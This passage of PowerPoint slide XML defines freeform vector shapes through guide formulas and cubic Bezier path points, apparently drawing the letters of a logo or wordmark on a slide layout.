                    <a:gd name="T17" fmla="*/ 3 h 63"/>
                    <a:gd name="T18" fmla="*/ 14 w 20"/>
                    <a:gd name="T19" fmla="*/ 36 h 63"/>
                    <a:gd name="T20" fmla="*/ 14 w 20"/>
                    <a:gd name="T21" fmla="*/ 0 h 63"/>
                    <a:gd name="T22" fmla="*/ 20 w 20"/>
                    <a:gd name="T23" fmla="*/ 0 h 63"/>
                    <a:gd name="T24" fmla="*/ 20 w 20"/>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63">
                      <a:moveTo>
                        <a:pt x="20" y="63"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="63"/>
                        <a:pt x="18" y="63"/>
                        <a:pt x="18" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="63"/>
                        <a:pt x="13" y="60"/>
                        <a:pt x="13" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="28"/>
                        <a:pt x="6" y="28"/>
                        <a:pt x="6" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="7" y="1"/>
                        <a:pt x="7" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="36"/>
                        <a:pt x="14" y="36"/>
                        <a:pt x="14" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="0"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="14" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="0"/>
                        <a:pt x="20" y="0"/>
                        <a:pt x="20" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="2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67"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9002713" y="3994151"/>
                  <a:ext cx="65088" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 26 w 28"/>
                    <a:gd name="T1" fmla="*/ 4 h 63"/>
                    <a:gd name="T2" fmla="*/ 23 w 28"/>
                    <a:gd name="T3" fmla="*/ 6 h 63"/>
                    <a:gd name="T4" fmla="*/ 18 w 28"/>
                    <a:gd name="T5" fmla="*/ 6 h 63"/>
                    <a:gd name="T6" fmla="*/ 16 w 28"/>
                    <a:gd name="T7" fmla="*/ 8 h 63"/>
                    <a:gd name="T8" fmla="*/ 16 w 28"/>
                    <a:gd name="T9" fmla="*/ 63 h 63"/>
                    <a:gd name="T10" fmla="*/ 11 w 28"/>
                    <a:gd name="T11" fmla="*/ 63 h 63"/>
                    <a:gd name="T12" fmla="*/ 10 w 28"/>
                    <a:gd name="T13" fmla="*/ 62 h 63"/>
                    <a:gd name="T14" fmla="*/ 10 w 28"/>
                    <a:gd name="T15" fmla="*/ 6 h 63"/>
                    <a:gd name="T16" fmla="*/ 0 w 28"/>
                    <a:gd name="T17" fmla="*/ 6 h 63"/>
                    <a:gd name="T18" fmla="*/ 0 w 28"/>
                    <a:gd name="T19" fmla="*/ 2 h 63"/>
                    <a:gd name="T20" fmla="*/ 2 w 28"/>
                    <a:gd name="T21" fmla="*/ 0 h 63"/>
                    <a:gd name="T22" fmla="*/ 28 w 28"/>
                    <a:gd name="T23" fmla="*/ 0 h 63"/>
                    <a:gd name="T24" fmla="*/ 26 w 28"/>
                    <a:gd name="T25" fmla="*/ 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63">
                      <a:moveTo>
                        <a:pt x="26" y="4"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="5"/>
                        <a:pt x="25" y="6"/>
                        <a:pt x="23" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="6"/>
                        <a:pt x="18" y="6"/>
                        <a:pt x="18" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="6"/>
                        <a:pt x="16" y="7"/>
                        <a:pt x="16" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="63"/>
                        <a:pt x="16" y="63"/>
                        <a:pt x="16" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="63"/>
                        <a:pt x="11" y="63"/>
                        <a:pt x="11" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="63"/>
                        <a:pt x="10" y="62"/>
                        <a:pt x="10" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="0"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="28" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="2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68"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9112250" y="3994151"/>
                  <a:ext cx="12700" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 6"/>
                    <a:gd name="T1" fmla="*/ 0 h 63"/>
                    <a:gd name="T2" fmla="*/ 6 w 6"/>
                    <a:gd name="T3" fmla="*/ 2 h 63"/>
                    <a:gd name="T4" fmla="*/ 6 w 6"/>
                    <a:gd name="T5" fmla="*/ 63 h 63"/>
                    <a:gd name="T6" fmla="*/ 2 w 6"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 6"/>
                    <a:gd name="T9" fmla="*/ 62 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 w 6"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 4 w 6"/>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6" h="63">
                      <a:moveTo>
                        <a:pt x="4" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="62"/>
                        <a:pt x="0" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>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369"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9190038" y="3994151"/>
                  <a:ext cx="49213" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 21 w 21"/>
                    <a:gd name="T1" fmla="*/ 0 h 63"/>
                    <a:gd name="T2" fmla="*/ 19 w 21"/>
                    <a:gd name="T3" fmla="*/ 4 h 63"/>
                    <a:gd name="T4" fmla="*/ 16 w 21"/>
                    <a:gd name="T5" fmla="*/ 6 h 63"/>
                    <a:gd name="T6" fmla="*/ 8 w 21"/>
                    <a:gd name="T7" fmla="*/ 6 h 63"/>
                    <a:gd name="T8" fmla="*/ 7 w 21"/>
                    <a:gd name="T9" fmla="*/ 8 h 63"/>
                    <a:gd name="T10" fmla="*/ 7 w 21"/>
                    <a:gd name="T11" fmla="*/ 27 h 63"/>
                    <a:gd name="T12" fmla="*/ 19 w 21"/>
                    <a:gd name="T13" fmla="*/ 27 h 63"/>
                    <a:gd name="T14" fmla="*/ 16 w 21"/>
                    <a:gd name="T15" fmla="*/ 32 h 63"/>
                    <a:gd name="T16" fmla="*/ 13 w 21"/>
                    <a:gd name="T17" fmla="*/ 34 h 63"/>
                    <a:gd name="T18" fmla="*/ 9 w 21"/>
                    <a:gd name="T19" fmla="*/ 34 h 63"/>
                    <a:gd name="T20" fmla="*/ 7 w 21"/>
                    <a:gd name="T21" fmla="*/ 36 h 63"/>
                    <a:gd name="T22" fmla="*/ 7 w 21"/>
                    <a:gd name="T23" fmla="*/ 61 h 63"/>
                    <a:gd name="T24" fmla="*/ 5 w 21"/>
                    <a:gd name="T25" fmla="*/ 63 h 63"/>
                    <a:gd name="T26" fmla="*/ 0 w 21"/>
                    <a:gd name="T27" fmla="*/ 63 h 63"/>
                    <a:gd name="T28" fmla="*/ 0 w 21"/>
                    <a:gd name="T29" fmla="*/ 2 h 63"/>
                    <a:gd name="T30" fmla="*/ 2 w 21"/>
                    <a:gd name="T31" fmla="*/ 0 h 63"/>
                    <a:gd name="T32" fmla="*/ 21 w 21"/>
                    <a:gd name="T3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63">
                      <a:moveTo>
                        <a:pt x="21" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="1"/>
                        <a:pt x="19" y="4"/>
                        <a:pt x="19" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="5"/>
                        <a:pt x="18" y="6"/>
                        <a:pt x="16" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="6"/>
                        <a:pt x="8" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="7" y="7"/>
                        <a:pt x="7" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="27"/>
                        <a:pt x="7" y="27"/>
                        <a:pt x="7" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="27"/>
                        <a:pt x="19" y="27"/>
                        <a:pt x="19" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="32"/>
                        <a:pt x="16" y="32"/>
                        <a:pt x="16" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="33"/>
                        <a:pt x="15" y="34"/>
                        <a:pt x="13" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="34"/>
                        <a:pt x="9" y="34"/>
                        <a:pt x="9" y="34"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="34"/>
                        <a:pt x="7" y="35"/>
                        <a:pt x="7" y="36"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="61"/>
                        <a:pt x="7" y="61"/>
                        <a:pt x="7" y="61"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="62"/>
                        <a:pt x="6" y="63"/>
                        <a:pt x="5" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBez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70"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9291638" y="3994151"/>
                  <a:ext cx="14288" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 6"/>
                    <a:gd name="T1" fmla="*/ 0 h 63"/>
                    <a:gd name="T2" fmla="*/ 6 w 6"/>
                    <a:gd name="T3" fmla="*/ 2 h 63"/>
                    <a:gd name="T4" fmla="*/ 6 w 6"/>
                    <a:gd name="T5" fmla="*/ 63 h 63"/>
                    <a:gd name="T6" fmla="*/ 2 w 6"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 6"/>
                    <a:gd name="T9" fmla="*/ 62 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 w 6"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 4 w 6"/>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6" h="63">
                      <a:moveTo>
                        <a:pt x="4" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="62"/>
                        <a:pt x="0" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>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71"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9366250" y="3992563"/>
                  <a:ext cx="46038" cy="150813"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 20 w 20"/>
                    <a:gd name="T1" fmla="*/ 57 h 65"/>
                    <a:gd name="T2" fmla="*/ 12 w 20"/>
                    <a:gd name="T3" fmla="*/ 65 h 65"/>
                    <a:gd name="T4" fmla="*/ 8 w 20"/>
                    <a:gd name="T5" fmla="*/ 65 h 65"/>
                    <a:gd name="T6" fmla="*/ 0 w 20"/>
                    <a:gd name="T7" fmla="*/ 57 h 65"/>
                    <a:gd name="T8" fmla="*/ 0 w 20"/>
                    <a:gd name="T9" fmla="*/ 8 h 65"/>
                    <a:gd name="T10" fmla="*/ 8 w 20"/>
                    <a:gd name="T11" fmla="*/ 0 h 65"/>
                    <a:gd name="T12" fmla="*/ 12 w 20"/>
                    <a:gd name="T13" fmla="*/ 0 h 65"/>
                    <a:gd name="T14" fmla="*/ 20 w 20"/>
                    <a:gd name="T15" fmla="*/ 8 h 65"/>
                    <a:gd name="T16" fmla="*/ 20 w 20"/>
                    <a:gd name="T17" fmla="*/ 18 h 65"/>
                    <a:gd name="T18" fmla="*/ 19 w 20"/>
                    <a:gd name="T19" fmla="*/ 21 h 65"/>
                    <a:gd name="T20" fmla="*/ 14 w 20"/>
                    <a:gd name="T21" fmla="*/ 23 h 65"/>
                    <a:gd name="T22" fmla="*/ 14 w 20"/>
                    <a:gd name="T23" fmla="*/ 9 h 65"/>
                    <a:gd name="T24" fmla="*/ 10 w 20"/>
                    <a:gd name="T25" fmla="*/ 6 h 65"/>
                    <a:gd name="T26" fmla="*/ 7 w 20"/>
                    <a:gd name="T27" fmla="*/ 9 h 65"/>
                    <a:gd name="T28" fmla="*/ 7 w 20"/>
                    <a:gd name="T29" fmla="*/ 56 h 65"/>
                    <a:gd name="T30" fmla="*/ 10 w 20"/>
                    <a:gd name="T31" fmla="*/ 59 h 65"/>
                    <a:gd name="T32" fmla="*/ 14 w 20"/>
                    <a:gd name="T33" fmla="*/ 56 h 65"/>
                    <a:gd name="T34" fmla="*/ 14 w 20"/>
                    <a:gd name="T35" fmla="*/ 47 h 65"/>
                    <a:gd name="T36" fmla="*/ 16 w 20"/>
                    <a:gd name="T37" fmla="*/ 43 h 65"/>
                    <a:gd name="T38" fmla="*/ 20 w 20"/>
                    <a:gd name="T39" fmla="*/ 41 h 65"/>
                    <a:gd name="T40" fmla="*/ 20 w 20"/>
                    <a:gd name="T41"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65">
                      <a:moveTo>
                        <a:pt x="20" y="57"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="61"/>
                        <a:pt x="17" y="65"/>
                        <a:pt x="12" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="65"/>
                        <a:pt x="8" y="65"/>
                        <a:pt x="8" y="65"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="65"/>
                        <a:pt x="0" y="61"/>
                        <a:pt x="0" y="57"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="8"/>
                        <a:pt x="0" y="8"/>
                        <a:pt x="0" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="4"/>
                        <a:pt x="4" y="0"/>
                        <a:pt x="8" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="0"/>
                        <a:pt x="12" y="0"/>
                        <a:pt x="12" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="0"/>
                        <a:pt x="20" y="4"/>
                        <a:pt x="20" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="18"/>
                        <a:pt x="20" y="18"/>
                        <a:pt x="20" y="18"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="20"/>
                        <a:pt x="19" y="21"/>
                        <a:pt x="19" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="23"/>
                        <a:pt x="14" y="23"/>
                        <a:pt x="14" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="9"/>
                        <a:pt x="14" y="9"/>
                        <a:pt x="14" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="7"/>
                        <a:pt x="12" y="6"/>
                        <a:pt x="10" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="7" y="7"/>
                        <a:pt x="7" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="56"/>
                        <a:pt x="7" y="56"/>
                        <a:pt x="7" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="57"/>
                        <a:pt x="8" y="59"/>
                        <a:pt x="10" y="59"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="59"/>
                        <a:pt x="14" y="57"/>
                        <a:pt x="14" y="56"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="47"/>
                        <a:pt x="14" y="47"/>
                        <a:pt x="14" y="47"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="45"/>
                        <a:pt x="15" y="44"/>
                        <a:pt x="16" y="43"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="43"/>
                        <a:pt x="19" y="42"/>
                        <a:pt x="20" y="41"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="2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372"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9455150" y="3994151"/>
                  <a:ext cx="60325" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 26 w 26"/>
                    <a:gd name="T1" fmla="*/ 63 h 63"/>
                    <a:gd name="T2" fmla="*/ 19 w 26"/>
                    <a:gd name="T3" fmla="*/ 63 h 63"/>
                    <a:gd name="T4" fmla="*/ 13 w 26"/>
                    <a:gd name="T5" fmla="*/ 19 h 63"/>
                    <a:gd name="T6" fmla="*/ 7 w 26"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 26"/>
                    <a:gd name="T9" fmla="*/ 63 h 63"/>
                    <a:gd name="T10" fmla="*/ 10 w 26"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 13 w 26"/>
                    <a:gd name="T13" fmla="*/ 0 h 63"/>
                    <a:gd name="T14" fmla="*/ 17 w 26"/>
                    <a:gd name="T15" fmla="*/ 3 h 63"/>
                    <a:gd name="T16" fmla="*/ 26 w 2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63">
                      <a:moveTo>
                        <a:pt x="26" y="63"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="63"/>
                        <a:pt x="19" y="63"/>
                        <a:pt x="19" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="19"/>
                        <a:pt x="13" y="19"/>
                        <a:pt x="13" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="63"/>
                        <a:pt x="7" y="63"/>
                        <a:pt x="7" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="0"/>
                        <a:pt x="10" y="0"/>
                        <a:pt x="10" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="0"/>
                        <a:pt x="13" y="0"/>
                        <a:pt x="13" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="0"/>
                        <a:pt x="17" y="1"/>
                        <a:pt x="17" y="3"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="26"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373"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9545638" y="3994151"/>
                  <a:ext cx="65088" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 26 w 28"/>
                    <a:gd name="T1" fmla="*/ 4 h 63"/>
                    <a:gd name="T2" fmla="*/ 23 w 28"/>
                    <a:gd name="T3" fmla="*/ 6 h 63"/>
                    <a:gd name="T4" fmla="*/ 18 w 28"/>
                    <a:gd name="T5" fmla="*/ 6 h 63"/>
                    <a:gd name="T6" fmla="*/ 16 w 28"/>
                    <a:gd name="T7" fmla="*/ 8 h 63"/>
                    <a:gd name="T8" fmla="*/ 16 w 28"/>
                    <a:gd name="T9" fmla="*/ 63 h 63"/>
                    <a:gd name="T10" fmla="*/ 11 w 28"/>
                    <a:gd name="T11" fmla="*/ 63 h 63"/>
                    <a:gd name="T12" fmla="*/ 10 w 28"/>
                    <a:gd name="T13" fmla="*/ 62 h 63"/>
                    <a:gd name="T14" fmla="*/ 10 w 28"/>
                    <a:gd name="T15" fmla="*/ 6 h 63"/>
                    <a:gd name="T16" fmla="*/ 0 w 28"/>
                    <a:gd name="T17" fmla="*/ 6 h 63"/>
                    <a:gd name="T18" fmla="*/ 0 w 28"/>
                    <a:gd name="T19" fmla="*/ 2 h 63"/>
                    <a:gd name="T20" fmla="*/ 2 w 28"/>
                    <a:gd name="T21" fmla="*/ 0 h 63"/>
                    <a:gd name="T22" fmla="*/ 28 w 28"/>
                    <a:gd name="T23" fmla="*/ 0 h 63"/>
                    <a:gd name="T24" fmla="*/ 26 w 28"/>
                    <a:gd name="T25" fmla="*/ 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63">
                      <a:moveTo>
                        <a:pt x="26" y="4"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="5"/>
                        <a:pt x="25" y="6"/>
                        <a:pt x="23" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="6"/>
                        <a:pt x="18" y="6"/>
                        <a:pt x="18" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="6"/>
                        <a:pt x="16" y="7"/>
                        <a:pt x="16" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="63"/>
                        <a:pt x="16" y="63"/>
                        <a:pt x="16" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="63"/>
                        <a:pt x="11" y="63"/>
                        <a:pt x="11" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="63"/>
                        <a:pt x="10" y="62"/>
                        <a:pt x="10" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="6"/>
                        <a:pt x="10" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="6"/>
                        <a:pt x="0" y="6"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                        <a:pt x="0" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="1"/>
                        <a:pt x="1" y="0"/>
                        <a:pt x="2" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="0"/>
                        <a:pt x="28" y="0"/>
                        <a:pt x="28" y="0"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="2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374"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9655175" y="3994151"/>
                  <a:ext cx="12700" cy="146050"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 4 w 6"/>
                    <a:gd name="T1" fmla="*/ 0 h 63"/>
                    <a:gd name="T2" fmla="*/ 6 w 6"/>
                    <a:gd name="T3" fmla="*/ 2 h 63"/>
                    <a:gd name="T4" fmla="*/ 6 w 6"/>
                    <a:gd name="T5" fmla="*/ 63 h 63"/>
                    <a:gd name="T6" fmla="*/ 2 w 6"/>
                    <a:gd name="T7" fmla="*/ 63 h 63"/>
                    <a:gd name="T8" fmla="*/ 0 w 6"/>
                    <a:gd name="T9" fmla="*/ 62 h 63"/>
                    <a:gd name="T10" fmla="*/ 0 w 6"/>
                    <a:gd name="T11" fmla="*/ 0 h 63"/>
                    <a:gd name="T12" fmla="*/ 4 w 6"/>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6" h="63">
                      <a:moveTo>
                        <a:pt x="4" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="0"/>
                        <a:pt x="6" y="1"/>
                        <a:pt x="6" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                        <a:pt x="6" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                        <a:pt x="2" y="63"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="63"/>
                        <a:pt x="0" y="62"/>
                        <a:pt x="0" y="62"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>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8" name="Freeform 376"/>
              <p:cNvSpPr>
                <a:spLocks noEditPoints="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="9728200" y="3992563"/>
                <a:ext cx="49213" cy="150813"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 13 w 21"/>
